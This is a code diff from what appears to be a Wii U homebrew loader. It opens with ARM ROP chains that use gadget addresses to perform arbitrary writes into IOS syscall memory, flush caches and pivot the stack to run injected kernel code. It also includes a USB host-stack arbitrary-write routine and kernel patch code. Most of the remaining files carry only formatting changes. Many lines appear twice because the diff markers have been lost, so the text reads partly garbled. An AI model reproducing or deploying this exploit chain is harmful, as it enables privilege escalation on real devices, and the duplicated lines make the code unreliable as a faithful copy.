0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(ios_kernel),// 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(ios_kernel), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
};
static const int second_chain[] = {
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x00130000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x00130000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x0,
0x0,
0x0,
0x00110000 - 0x44, // 0x8C
0x00110010, // 0x90
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0,
0x0,
0x1012EA68, // 0xAC stack pivot
@ -305,7 +305,7 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
memcpy((char *) (0xF4140000), ios_kernel, sizeof(ios_kernel));
payload_info_t *payloads = (payload_info_t *) 0xF4148000;
payloads->size = sizeof(ios_usb);
payloads->size = sizeof(ios_usb);
memcpy(payloads->data, ios_usb, payloads->size);
pretend_root_hub[33] = 0x500000;
@ -319,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
}
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
OSSleepTicks(0x200000); //! Improves stability
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
OSSleepTicks(0x200000); //! Improves stability
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

1
source/ios_kernel/source/elf_abi.h
View File

@ -1,3 +1,4 @@
// clang-format off
/*
* Copyright (c) 1995, 1996, 2001, 2002
* Erik Theisen. All rights reserved.

6
source/ios_kernel/source/elf_patcher.c
View File

@ -21,16 +21,14 @@
* 3. This notice may not be removed or altered from any source
* distribution.
***************************************************************************/
#include "types.h"
#include "elf_abi.h"
#include "types.h"
#include "utils.h"
static Elf32_Phdr *get_section(u32 data, u32 vaddr) {
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data;
if (!IS_ELF (*ehdr)
|| (ehdr->e_type != ET_EXEC)
|| (ehdr->e_machine != EM_ARM)) {
if (!IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_ARM)) {
return 0;
}

8
source/ios_kernel/source/elf_patcher.h
View File

@ -26,10 +26,10 @@
#include "types.h"
#define ARM_B(addr, func) (0xEA000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB
#define ARM_BL(addr, func) (0xEB000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB
#define THUMB_B(addr, func) ((0xE000 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x7FF))) // +-2KB
#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x0FFF)) | ((((u32)(func) - (u32)(addr) - 4) << 4) & 0x7FFF000)) // +-4MB
#define ARM_B(addr, func) (0xEA000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB
#define ARM_BL(addr, func) (0xEB000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB
#define THUMB_B(addr, func) ((0xE000 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x7FF))) // +-2KB
#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x0FFF)) | ((((u32) (func) - (u32) (addr) -4) << 4) & 0x7FFF000)) // +-4MB
typedef struct {
u32 address;

12
source/ios_kernel/source/instant_patches.c
View File

@ -21,17 +21,17 @@
* 3. This notice may not be removed or altered from any source
* distribution.
***************************************************************************/
#include "utils.h"
#include "types.h"
#include "kernel_patches.h"
#include "types.h"
#include "utils.h"
#define mcp_rodata_phys(addr) ((u32)(addr) - 0x05060000 + 0x08220000)
#define mcp_data_phys(addr) ((u32)(addr) - 0x05074000 + 0x08234000)
#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000)
#define mcp_rodata_phys(addr) ((u32) (addr) -0x05060000 + 0x08220000)
#define mcp_data_phys(addr) ((u32) (addr) -0x05074000 + 0x08234000)
#define acp_phys(addr) ((u32) (addr) -0xE0000000 + 0x12900000)
void instant_patches_setup(void) {
// fix 10 minute timeout that crashes MCP after 10 minutes of booting
*(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
*(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT
// patch default title id to system menu
*(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0;

7
source/ios_kernel/source/kernel_patches.c
View File

@ -21,9 +21,9 @@
* 3. This notice may not be removed or altered from any source
* distribution.
***************************************************************************/
#include "types.h"
#include "elf_patcher.h"
#include "kernel_patches.h"
#include "elf_patcher.h"
#include "types.h"
#include "utils.h"
extern void __KERNEL_CODE_START(void);
@ -34,7 +34,7 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) {
void (*kernel_launch_bootrom)(u32 launch_address, u32 L, u32 C, u32 H) = (void *) 0x0812A050;
if (*(u32 *) (launch_address - 0x300 + 0x1AC) == 0x00DFD000) {
int level = disable_interrupts();
int level = disable_interrupts();
unsigned int control_register = disable_mmu();
u32 ios_elf_start = launch_address + 0x804 - 0x300;
@ -58,4 +58,3 @@ void kernel_run_patches(u32 ios_elf_start) {
section_write_word(ios_elf_start, 0xe22b2a78, 0x00000000);
section_write_word(ios_elf_start, 0xe204fb68, 0xe3a00000);
}

10
source/ios_kernel/source/main.c
View File

@ -21,17 +21,18 @@
* 3. This notice may not be removed or altered from any source
* distribution.
***************************************************************************/
#include "instant_patches.h"
#include "types.h"
#include "utils.h"
#include "instant_patches.h"
#define USB_PHYS_CODE_BASE 0x101312D0
#define USB_PHYS_CODE_BASE 0x101312D0
typedef struct {
u32 size;
u8 data[0];
} payload_info_t;
// clang-format off
static const char repairData_set_fault_behavior[] = {
0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00,
0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02,
@ -55,11 +56,12 @@ static const char repairData_usb_root_thread[] = {
0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03,
0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20,
};
// clang-format on
int _main() {
void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
void (*invalidate_icache)() = (void (*)()) 0x0812DCF0;
void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164;
void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160;
flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache

2
source/ios_kernel/source/utils.c
View File

@ -30,7 +30,7 @@ void reverse_memcpy(void *dst, const void *src, unsigned int size) {
if ((size >= 4) && !((dst - src) & 3)) {
const unsigned int *src_p32;
unsigned int *dst_p32;
unsigned int endDst = ((unsigned int) dst) + size;
unsigned int endDst = ((unsigned int) dst) + size;
unsigned int endRest = endDst & 3;
if (endRest) {

29
source/ios_kernel/source/utils.h
View File

@ -24,30 +24,37 @@
#ifndef _UTILS_H
#define _UTILS_H
#define ALIGN4(x) (((x) + 3) & ~3)
#define ALIGN4(x) (((x) + 3) & ~3)
#define kernel_memcpy ((void * (*)(void*, const void*, int))0x08131D04)
#define kernel_memset ((void *(*)(void*, int, unsigned int))0x08131DA0)
#define kernel_strncpy ((char *(*)(char*, const char*, unsigned int))0x081329B8)
#define disable_interrupts ((int(*)())0x0812E778)
#define enable_interrupts ((int(*)(int))0x0812E78C)
#define kernel_bsp_command_5 ((int (*)(const char*, int offset, const char*, int size, void *buffer))0x0812EC40)
#define kernel_memcpy ((void *(*) (void *, const void *, int) ) 0x08131D04)
#define kernel_memset ((void *(*) (void *, int, unsigned int) ) 0x08131DA0)
#define kernel_strncpy ((char *(*) (char *, const char *, unsigned int) ) 0x081329B8)
#define disable_interrupts ((int (*)()) 0x0812E778)
#define enable_interrupts ((int (*)(int)) 0x0812E78C)
#define kernel_bsp_command_5 ((int (*)(const char *, int offset, const char *, int size, void *buffer)) 0x0812EC40)
void reverse_memcpy(void *dest, const void *src, unsigned int size);
static inline unsigned int disable_mmu(void) {
unsigned int control_register = 0;
asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register));
asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA));
asm volatile("MRC p15, 0, %0, c1, c0, 0"
: "=r"(control_register));
asm volatile("MCR p15, 0, %0, c1, c0, 0"
:
: "r"(control_register & 0xFFFFEFFA));
return control_register;
}
static inline void restore_mmu(unsigned int control_register) {
asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register));
asm volatile("MCR p15, 0, %0, c1, c0, 0"
:
: "r"(control_register));
}
static inline void set_domain_register(unsigned int domain_register) {
asm volatile("MCR p15, 0, %0, c3, c0, 0" : : "r" (domain_register));
asm volatile("MCR p15, 0, %0, c3, c0, 0"
:
: "r"(domain_register));
}
#endif

3
source/ios_usb/source/main.c
View File

@ -5,7 +5,7 @@ void _main() {
int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04;
int saved_handle = *(volatile int *) 0x0012F000;
int myret = reply(saved_handle, 0);
int myret = reply(saved_handle, 0);
if (myret != 0) {
ios_shutdown(1);
}
@ -20,5 +20,4 @@ void _main() {
"newlr: .word 0x1012EACC\n"
"newr0: .word 0x10146080\n"
"newpc: .word 0x10111164\n");
}

32
source/main.cpp
View File

@ -1,25 +1,25 @@
#include <coreinit/time.h>
#include <cstdio>
#include <cstring>
#include <coreinit/time.h>
#include <coreinit/foreground.h>
#include <nn/act/client_cpp.h>
#include <proc_ui/procui.h>
#include <coreinit/thread.h>
#include <coreinit/screen.h>
#include <coreinit/thread.h>
#include <proc_ui/procui.h>
#include <whb/log.h>
#include <whb/log_udp.h>
#include <sysapp/launch.h>
#include <sysapp/title.h>
#include <coreinit/cache.h>
#include <vpad/input.h>
#include <string>
#include "utils/logger.h"
#include "ElfUtils.h"
#include "ios_exploit.h"
#include "utils/logger.h"
#include <coreinit/cache.h>
#include <string>
#include <sysapp/launch.h>
#include <sysapp/title.h>
#include <vpad/input.h>
#include <whb/log.h>
#include <whb/log_udp.h>
#include "gx2sploit.h"
@ -65,11 +65,11 @@ int main(int argc, char **argv) {
}
bool loadWithoutHacks = false;
bool kernelDone = false;
bool skipKernel = false;
bool kernelDone = false;
bool skipKernel = false;
if ((btn & VPAD_BUTTON_R) == VPAD_BUTTON_R) {
skipKernel = true;
skipKernel = true;
loadWithoutHacks = true;
}
if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
@ -120,7 +120,7 @@ int main(int argc, char **argv) {
forceDefaultTitleIDToWiiUMenu();
nn::act::Initialize();
nn::act::SlotNo slot = nn::act::GetSlotNo();
nn::act::SlotNo slot = nn::act::GetSlotNo();
nn::act::SlotNo defaultSlot = nn::act::GetDefaultAccount();
nn::act::Finalize();
@ -145,7 +145,7 @@ int main(int argc, char **argv) {
return 0;
}
void forceDefaultTitleIDToWiiUMenu() {// Restore the default title id to the normal Wii U Menu.
void forceDefaultTitleIDToWiiUMenu() { // Restore the default title id to the normal Wii U Menu.
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU);
memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
DCStoreRange((void *) 0xF417FFF0, 0x8);

10
source/utils/logger.h
View File

@ -1,20 +1,20 @@
#pragma once
#include <whb/log.h>
#include <string.h>
#include <whb/log.h>
#ifdef __cplusplus
extern "C" {
#endif
#define __FILENAME_X__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__)
#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__)
#define DEBUG_FUNCTION_LINE(FMT, ARGS...)do { \
WHBLogPrintf("[%23s]%30s@L%04d: " FMT "",__FILENAME__,__FUNCTION__, __LINE__, ## ARGS); \
#define DEBUG_FUNCTION_LINE(FMT, ARGS...) \
do { \
WHBLogPrintf("[%23s]%30s@L%04d: " FMT "", __FILENAME__, __FUNCTION__, __LINE__, ##ARGS); \
} while (0)
#ifdef __cplusplus
}
#endif